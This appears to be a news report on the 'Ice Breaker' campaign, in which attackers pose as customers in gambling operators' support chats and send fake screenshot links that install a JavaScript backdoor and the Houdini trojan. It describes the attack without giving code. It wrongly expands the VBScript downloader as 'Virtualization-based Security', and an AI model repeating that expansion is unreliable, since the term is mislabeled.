A new cyber attack campaign has been targeting the gambling and gaming industries since at least September 2022 and is still underway, amid the preparations for the gaming industry trade fair event ICE London 2023 that is set to start on February 7th.
Recently, the Israeli cybersecurity firm Security Joes has been tracking the campaign and revealed that the activity cluster, which has been operating under the name Ice Breaker, has been involved in the intrusions. The latter employs some clever social engineering tactics aimed at deploying a JavaScript backdoor for the intrusion to come through.
As revealed by Security Joes, the sequence of the attacks proceeds under a certain scheme – the threat actor masks themselves as a customer while starting a chat with a customer service agent of a gambling operator under the excuse they have some troubles while registering an account with the company. In this case, the attacker is perfectly aware of the fact that the customer service of the company is human-operated. The individual then asks the customer service agent to open a screenshot image hosted on Dropbox, which ensures the provision of the necessary JavaScript backdoor for the cyber attackers.
As soon as the customer service agent clicks on the purported screenshot link sent by the “customer”, either an LNK payload or a VBScript file is retrieved, with either of them being specially configured to download and run an MSI package that brings a Node.js implant.
Attackers Masked as Gambling Company Customers Get Access to Sensitive Internal Data
As the Israeli cybersecurity company revealed, the file containing the JavaScript has all the features of a typical backdoor, which enables the attacker to get access to running processes, exfiltrate arbitrary files, run VBScript imported from a remote server, steal cookies and passwords, take screenshots, and even open a reverse proxy on the compromised gambling operator’s website.
Once the Virtualization-based Security (VBS) downloader is executed by the victim, the cyber attack is finalized in the deployment of a VBS-based trojan ensuring remote access, called Houdini, which was created back in 2013.
For the time being, the origins of the attackers remain unknown. As claimed by Security Joes in its report, the individuals claiming to be gambling operators’ customers and sending the VBS-based remote access trojan have been observed using broken English at the time they communicated with the companies’ customer service agents. Back in October 2022, the MalwareHunterTeam shared some indicators of compromise linked to the cyber attack campaign targeting gambling companies from all over the world.
The senior threat researcher at Security Joes, Felipe Duarte, explained that was a highly-effective attack vector for the global gambling and gaming industry. According to Mr. Duarte, the attackers had managed to compile JavaScript second-stage malware, which is extremely difficult to dissect, which proves that whoever stands behind the attacks has skills and experience in the area, with the potential of even being sponsored by another interested person or organization.